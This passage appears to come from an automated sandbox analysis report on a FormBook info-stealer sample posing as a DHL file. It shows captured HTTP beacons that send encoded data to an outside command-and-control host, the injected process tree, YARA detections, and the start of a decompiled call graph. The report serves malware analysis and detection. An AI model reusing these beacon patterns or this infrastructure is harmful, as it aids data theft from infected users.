                                                                                Data Raw: 55 7a 47 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 4d 30 71 68 75 2f 53 71 4b 4c 44 43 47 38 4e 50 79 48 34 57 42 74 34 68 7a 43 79 55 71 71 52 6a 37 71 63 30 57 30 3d
                                                                                Data Ascii: UzG=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
                                                                                Dec 24, 2024 08:26:49.799134016 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 795
                                                                                date: Tue, 24 Dec 2024 07:26:49 GMT
                                                                                server: LiteSpeed
                                                                                location: https://www.empowermedeco.com/fo8o/
                                                                                platform: hostinger
                                                                                panel: hpanel
                                                                                content-security-policy: upgrade-insecure-requests
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.550000217.196.55.202803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:51.177751064 CET807OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.empowermedeco.com
                                                                                Origin: http://www.empowermedeco.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 224
                                                                                Referer: http://www.empowermedeco.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 41 78 67 4b 46 46 61 4c 34 35 59 36 73 71 42 6a 43 35 30 6a 4c 41 61 59 62 59 48 4c 72 6a 6c 56 48 6b 36 30 65
                                                                                Data Ascii: UzG=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
                                                                                Dec 24, 2024 08:26:52.374905109 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 795
                                                                                date: Tue, 24 Dec 2024 07:26:52 GMT
                                                                                server: LiteSpeed
                                                                                location: https://www.empowermedeco.com/fo8o/
                                                                                platform: hostinger
                                                                                panel: hpanel
                                                                                content-security-policy: upgrade-insecure-requests
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.550001217.196.55.202803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:53.837863922 CET1824OUTPOST /fo8o/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.empowermedeco.com
                                                                                Origin: http://www.empowermedeco.com
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1240
                                                                                Referer: http://www.empowermedeco.com/fo8o/
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Data Raw: 55 7a 47 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 7a 66 57 5a 6e 4e 6e 31 33 44 6b 46 66 7a 44 2f 49 65 45 6e 42 33 32 7a 51 2f 57 4b 65 45 72 65 54 79 34 78 6b 73 63 6f 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 30 4f 5a 6e 37 68 75 35 4b 34 66 37 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 38 [TRUNCATED]
                                                                                Data Ascii: UzG=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJzfWZnNn13DkFfzD/IeEnB32zQ/WKeEreTy4xkscoKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO0OZn7hu5K4f7/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2Z4DLsRiX3Lp0HW7TCxYtU4ZQ0Z76PIyBxrpQaYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu8MmqcFpInCSSLUBZtWl9VprTKhZgTSWvD2RlFYmMA7+Lb5PGcmVjWkVmxFmylchMU6MdzfC5pclVzpVEPCUK6M4jzo7tIG1s1O1ak4ykjdpyQ9xtDHHQA93zk4EKjkjKhMy49kY9AeVOS1QFlhCJ7NWY+WS6g/g4IfKQ6nMXtOfp1me9SuV4isExiAMQadOxuYpDdpEc9j4BkSGpFubTofCJvLdpYJtd10AQEJ3+cC2GenvzPy0w2VUmnJZV39NWexe2UiH1QCirMz0q9LbeNXooO6lJV/pgXoootP/t8LClJ0Bg/pKgJuDs76xxp8mEJB3/aVWJ6Jof4nmtHkIlH/KY8jN+pyVZl5f9G2CT0FNl7QuENSPqexlnbd1z7d6vtPZoC+knFtqLdqVS33jhJj4f5JK1m3UuFc+glIDn+MQbeUwvRUTjLfJ2b3gUIqRnLKFq+crb6I2ceLGKWUvw13hsdGwo7rTrDG6r3waLOwS3BN29x731ATO6CO8B0CiGE7uVORxZRW2Yk9L4cQ [TRUNCATED]
                                                                                Dec 24, 2024 08:26:55.035578012 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 795
                                                                                date: Tue, 24 Dec 2024 07:26:54 GMT
                                                                                server: LiteSpeed
                                                                                location: https://www.empowermedeco.com/fo8o/
                                                                                platform: hostinger
                                                                                panel: hpanel
                                                                                content-security-policy: upgrade-insecure-requests
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.550002217.196.55.202803440C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 24, 2024 08:26:56.487705946 CET517OUTGET /fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en
                                                                                Host: www.empowermedeco.com
                                                                                Connection: close
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                Dec 24, 2024 08:26:57.687829018 CET1234INHTTP/1.1 301 Moved Permanently
                                                                                Connection: close
                                                                                content-type: text/html
                                                                                content-length: 795
                                                                                date: Tue, 24 Dec 2024 07:26:57 GMT
                                                                                server: LiteSpeed
                                                                                location: https://www.empowermedeco.com/fo8o/?UzG=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&SFst=D27DuB
                                                                                platform: hostinger
                                                                                panel: hpanel
                                                                                content-security-policy: upgrade-insecure-requests
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:02:23:02
                                                                                Start date:24/12/2024
                                                                                Path:C:\Users\user\Desktop\DHL 806-232024.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\DHL 806-232024.exe"
                                                                                Imagebase:0x8d0000
                                                                                File size:1'208'832 bytes
                                                                                MD5 hash:A32E770C62BAB92FB9F5413A70A62836
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:02:23:03
                                                                                Start date:24/12/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\DHL 806-232024.exe"
                                                                                Imagebase:0x380000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:02:23:10
                                                                                Start date:24/12/2024
                                                                                Path:C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe"
                                                                                Imagebase:0x4d0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:4
                                                                                Start time:02:23:12
                                                                                Start date:24/12/2024
                                                                                Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                Imagebase:0xab0000
                                                                                File size:22'016 bytes
                                                                                MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:6
                                                                                Start time:02:23:25
                                                                                Start date:24/12/2024
                                                                                Path:C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe"
                                                                                Imagebase:0x4d0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:7
                                                                                Start time:02:23:37
                                                                                Start date:24/12/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff79f9e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.4%
                                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                                  Signature Coverage:8.2%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:154
                                                                                  execution_graph 99084 8d107d 99089 8d71eb 99084->99089 99086 8d108c 99120 8f2f80 99086->99120 99090 8d71fb __ftell_nolock 99089->99090 99123 8d77c7 99090->99123 99094 8d72ba 99135 8f074f 99094->99135 99101 8d77c7 59 API calls 99102 8d72eb 99101->99102 99154 8d7eec 99102->99154 99104 8d72f4 RegOpenKeyExW 99105 90ecda RegQueryValueExW 99104->99105 99109 8d7316 Mailbox 99104->99109 99106 90ecf7 99105->99106 99107 90ed6c RegCloseKey 99105->99107 99158 8f0ff6 99106->99158 99107->99109 99119 90ed7e _wcscat Mailbox __NMSG_WRITE 99107->99119 99109->99086 99110 90ed10 99168 8d538e 99110->99168 99111 8d7b52 59 API calls 99111->99119 99114 90ed38 99171 8d7d2c 99114->99171 99116 90ed52 99116->99107 99118 8d3f84 59 API calls 99118->99119 99119->99109 99119->99111 99119->99118 99180 8d7f41 99119->99180 99245 8f2e84 99120->99245 99122 8d1096 99124 8f0ff6 Mailbox 59 API calls 99123->99124 99125 8d77e8 99124->99125 99126 8f0ff6 Mailbox 59 API calls 99125->99126 99127 8d72b1 99126->99127 99128 8d4864 99127->99128 99184 901b90 99128->99184 99131 8d7f41 59 API calls 99132 8d4897 99131->99132 99186 8d48ae 99132->99186 99134 8d48a1 Mailbox 99134->99094 99136 901b90 __ftell_nolock 99135->99136 99137 8f075c GetFullPathNameW 99136->99137 99138 8f077e 99137->99138 99139 8d7d2c 59 API calls 99138->99139 99140 8d72c5 99139->99140 99141 8d7e0b 99140->99141 99142 8d7e1f 99141->99142 99143 90f173 99141->99143 99208 8d7db0 99142->99208 99213 8d8189 99143->99213 99146 8d72d3 99148 8d3f84 99146->99148 99147 90f17e __NMSG_WRITE _memmove 99149 8d3f92 99148->99149 99153 8d3fb4 _memmove 99148->99153 99151 8f0ff6 Mailbox 59 API calls 99149->99151 99150 8f0ff6 Mailbox 59 API calls 99152 8d3fc8 99150->99152 99151->99153 99152->99101 99153->99150 99155 8d7f06 99154->99155 99157 8d7ef9 99154->99157 99156 8f0ff6 Mailbox 59 API calls 99155->99156 99156->99157 99157->99104 99160 8f0ffe 99158->99160 99161 8f1018 